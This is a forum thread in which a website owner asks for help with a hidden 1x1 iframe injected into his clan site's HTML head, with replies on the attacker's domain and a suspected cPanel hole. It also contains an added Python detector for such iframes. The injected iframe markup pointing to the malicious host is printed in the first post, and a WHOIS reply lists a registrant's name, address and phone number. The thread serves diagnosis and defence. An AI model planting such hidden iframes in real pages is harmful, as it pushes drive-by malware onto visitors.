Has my website been hacked?

Soldato
Joined
16 Apr 2004
Posts
3,869
Location
Shropshire
Just returned from my holiday to be told by a few of my clan members that Websense was stopping them from viewing our site at work, and a few other members were reporting that their AVs were triggered when viewing our site.

When I got back I checked the site and nothing appeared out of the ordinary.

Until I spotted this -

Website as it appears normally in Firefox:

[image: ctpage.jpg]


However when I highlight the top left hand corner an "invisible" link appears:

[image: ctpage2.jpg]


Source code now contains this as well:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<iframe src="http://fl4w.info/jusse/index.php" frameborder="0" width="1" height="1" scrolling="no"></iframe><head>
http://fl4w.info/jusse/index.php<head>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Welcome to Chaos Theory Clan</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
-->
</style></head>

Any idea A, What the hell this is and B, How it got there?
 
Permabanned
Joined
18 May 2006
Posts
9,036
pwned by ruskies :p

Domain Name: FL4W.INFO
Created On: 10-Feb-2006 17:40:30 UTC
Last Updated On: 31-Jul-2006 19:57:31 UTC
Expiration Date: 10-Feb-2007 17:40:30 UTC
Sponsoring Registrar: Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status: OK
Registrant ID: DI_2383217
Registrant Name: Vladimir a Shulepov
Registrant Organization: whitehat
Registrant Street1: Leningradskya 1
Registrant Street2:
Registrant Street3:
Registrant City: Svertlovo
Registrant State/Province: Leningradskaya oblast
Registrant Postal Code: 200310
Registrant Country: RU
Registrant Phone: 7.812300500
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: [email protected]


--------------------

see here:
http://forum.catalyst2.com/showthread.php?p=16632

they did it here too:
http://www.bsalsa.com/


All sites listed here are either linked to sites that run exploits,
http://webhelper4u.net/whmembers/siteslists/cwsalphaA.txt
such as FL4W.INFO apparently

looks like it's been known about for a while.

so, yeh, if they can write to your front page, you have a flaw.
...got any logs left?

Soldato
OP
Joined
16 Apr 2004
Posts
3,869
Location
Shropshire
Interesting but doesn't really help me.

Edit - Cheers for the edit. I'd stumbled across that earlier when I googled it but none of it really made any sense.

I'll get access to the logs tomorrow but that page is literally a gif image (montage of clan pics) and a simple "enter" button. Nothing else.
 
Man of Honour
Joined
31 Jan 2004
Posts
16,335
Location
Plymouth
Due to the sensitive nature of recent exploits I haven't actually seen examples in the wild or indeed found much detail, however the last I heard there is an exploit going around which is placing iframe code on sites which will download a trojan to take advantage of a recently-discovered hole in IE (the one MS released the early patch for due to the mounting scale of attacks - this one) and generally do not-very-nice things.

IF this is caused by what I think it is (and I believe it is, looking at its style), then the server which hosts your account has probably been rooted (or at least affected by the recent exploit) and you should call up your hosting company IMMEDIATELY. There has been an attack going round whereby someone gains access to a cPanel server (as a standard user, say by purchasing a hosting account) and then exploits the hole in cPanel to write this iframe crap into people's websites. Not good.

There is a patch here, although upcp should also have picked it up by now.

At least one very large cPanel-based host was rather badly affected. cPanel released patches but it's believed the hole was known about and being used for weeks beforehand.

It seems too much of a coincidence to not be this, imo, though I don't wish to scaremonger :)
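A defender-side check for the kind of injection shown in the first post (a 1x1 off-site iframe written in front of the real head): an added example, not code from the thread or from cPanel, that assumes you have a saved copy of the page and know your own hostname; the sample HTML and the injected.example domain are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS tricks that hide a frame even when it is not 1x1
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _dim(value):
    """Parse a width/height attribute; missing or non-numeric counts as large."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 10**6


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags that point off-site and are visually hidden."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        offsite = bool(host) and host != self.site_host
        tiny = all(_dim(a.get(d)) <= 1 for d in ("width", "height"))
        css_hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
        if offsite and (tiny or css_hidden):
            self.findings.append({"src": src, "line": self.getpos()[0],
                                  "reason": "1x1" if tiny else "css-hidden"})


def find_hidden_iframes(html, site_host):
    """Return the suspicious iframes in `html` for a site served from `site_host`."""
    parser = HiddenIframeFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample modelled on the injected markup in the thread (placeholder domain)
SAMPLE = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<iframe src="http://injected.example/jusse/index.php" frameborder="0" width="1" height="1" scrolling="no"></iframe><head>
<head>
<title>Welcome to Chaos Theory Clan</title>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
</head></html>
"""
```

Run `find_hidden_iframes(open("index.html").read(), "www.yoursite.example")` over each saved page; a normal-sized embed from a video host is not reported, only frames that are both off-site and hidden.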
 
Soldato
Joined
4 Jun 2005
Posts
3,781
"Registrant Organization: whitehat "

That pretty much tells you, though I see no point in hacking such a website!
 
Man of Honour
Joined
31 Jan 2004
Posts
16,335
Location
Plymouth
zain said:
That pretty much tells you, though I see no point in hacking such a website!
Root server > add trojan downloading code to hundreds of sites > reproduce on thousands of servers > get trojan installed on thousands of PCs > make a fortune in the ad revenue.

All comes down to greed :(
 